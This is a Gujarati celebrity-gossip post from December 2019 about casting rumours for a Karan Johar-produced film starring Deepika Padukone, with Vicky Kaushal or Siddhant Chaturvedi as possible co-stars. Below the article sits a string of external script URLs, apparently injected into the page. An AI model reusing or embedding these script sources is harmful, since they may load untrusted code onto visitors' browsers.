કરણ જોહરની આગામી ફિલ્મમાં દીપિકા અને વિકી કૌશલ કામ કરશે તેવી અટકળો

December 7, 2019 - krishana trivedi

No Comments

દીપિકા અને કરણ સાથે કામ કરવા માટે એક યોગ્ય સ્ક્રિપ્ટની રાહ જોઇરહ્યા હતા. જે હવે મળી ગઇ હોવાના સમાચાર છે. કરણ જોહર નિર્મિત ફિલ્મમાં દીપિકા કામ કરવા રાજી થઇગઇ છે.આ ફિલ્મમાં દીપિકા સાથે વિકી કૌશલ કામ કરે તેવી શક્યતા છે.

 

આ ફિલ્મનું દિગ્દર્શન શકુન બત્રાનું હશે જેણે કરણની ‘કપૂર એન્ડ સન્સ’નું દિગ્દર્શન કર્યું હતું.કરણની આ ફિલ્મ મહિલા પ્રધાન વિષય ધરાવતી હશે. જેમાં દીપિકા મુખ્ય પાત્ર ભજવશે.  વળી બીજી વાત એ છે કે, ‘ગલી બોય’ નો સિદ્ધાંત ચતુર્વેદી આ ફિલ્મમાં દીપિકા સાથે રૂપેરી પડદે જોડી જમાવશે.કરણ વિકી અને સિદ્ધાંતમાંથી કોને ફાઇનલ કરે છે તે તો સમય જ દાખવશે.ઉલ્લેખનીય છે કે, સંજયલીલા ભણશાલીએ ફિલ્મ ‘પદ્માવત’ ના રાજા રતનસિંહના પાત્ર માટે વિકી કૌશલને પસંદ કર્યો હતો.

 

પરંતુ દીપિકાએ વિકી સાથે કામ કરવાનો ઇનકાર કર્યો હતો. જોકે ત્યારે વિકી બોલીવૂડમાં સ્થાયી થયો નહોતો. દીપિકા નવાસવા અભિનેતા સાથે કામ કરવા રાજી નહોતી.

 

 

 

 

 

//cilkonlay.com/2176e1b695bb4978f2.jshttp://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566xhttp://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1575714945799http://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks%5B%5D=31af2

krishana trivedi

Leave a comment

Your email address will not be published. Required fields are marked *